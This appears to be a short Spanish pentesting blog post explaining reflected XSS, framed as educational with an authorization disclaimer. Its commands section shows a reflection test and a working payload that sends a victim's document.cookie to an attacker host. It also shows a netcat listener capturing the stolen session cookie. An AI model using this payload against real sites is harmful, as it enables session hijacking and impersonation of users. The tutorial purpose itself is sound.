~ / blog / pentesting
KALI

Xss: roba la sesión

El Cross-Site Scripting, o XSS, deja inyectar JavaScript en una web para que se ejecute en el navegador de otros usuarios.

Primero pruebas si el sitio refleja tu entrada sin filtrar, con una alerta simple. Si funciona, el payload real roba la cookie de sesión de la víctima y te la envía.

Con esa cookie, entras como esa persona sin saber su contraseña. Sanitiza SIEMPRE lo que el usuario escribe.

# los comandos

kali@kali:~$ curl 'http://10.0.0.5/buscar?q=<script>alert(1)</script>'copiar
...<h2>Resultados para <script>alert(1)</script></h2>... (reflejado!)
kali@kali:~$ # payload: <script>new Image().src='http://10.0.0.50/c?='+document.cookie</script>copiar
kali@kali:~$ nc -lvnp 80copiar
GET /c?=session=eyJ1c2VyIjoiYWRtaW4i... (cookie robada)
Solo con permiso. Esto se muestra con fines educativos y defensivos: úsalo únicamente en sistemas propios o donde tengas autorización. Entender el ataque es lo que te permite defenderte de él.
root@cero: ~/newsletter
┌──(root@cero)-[~]
└─# suscribir --envio-semanal
un comando a la semana que te hace más difícil de hackear.
una sola herramienta, explicada en español claro, cada semana. lo mejor de los reels, directo a tu correo.
email =
sin spam. un correo a la semana. te sales cuando quieras.